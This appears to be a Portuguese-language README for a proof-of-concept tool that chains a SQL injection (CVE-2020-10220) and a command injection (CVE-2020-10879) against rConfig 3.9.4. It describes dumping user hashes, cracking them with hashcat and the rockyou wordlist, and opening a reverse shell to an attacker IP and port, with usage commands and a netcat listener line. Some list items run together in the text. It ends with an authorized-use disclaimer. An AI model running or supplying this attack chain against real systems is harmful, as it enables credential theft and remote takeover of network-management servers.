
PoCs combinados para rConfig: Injeção SQL (CVE-2020-10220) e Injeção de Comandos (CVE-2020-10879)
Este PoC tem como alvo a versão 3.9.4 do rConfig e demonstra a exploração através de uma combinação de vulnerabilidades de Injeção SQL e Injeção Remota de Comandos. Ele automatiza o processo de:
rockyou e as regras best64.rulesEste script é baseado e combina dois PoCs originais:
Ele foi modificado para automatizar a quebra e a geração opcional de shell.
requests (pip install requests)hashcat instalado e acessível via linha de comandorockyou.txt (ou equivalente) localizada em /usr/share/wordlists/rockyou.txt/usr/share/hashcat/rules/best64.rulePara extrair apenas usuários e hashes:
python3 rConfig_rce.py https://target
Para extrair usuários, quebrar senhas e tentar RCE (requer IP e porta do atacante para reverse shell):
python3 rConfig_rce.py https://target attacker_ip attacker_port
admin para a fase de injeção de comandos.nc -lvnp 80) rodando em sua máquina atacante para capturar o reverse shell.Esta ferramenta é destinada apenas a testes de segurança autorizados e fins educacionais. O uso não autorizado contra sistemas sem permissão é ilegal e antiético.